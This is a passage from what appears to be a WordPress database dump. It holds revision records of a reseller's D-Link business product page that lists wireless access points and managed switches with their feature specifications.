traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:44:29','2019-09-25 06:44:29','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3412,1,'2019-09-25 14:45:03','2019-09-25 06:45:03','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability 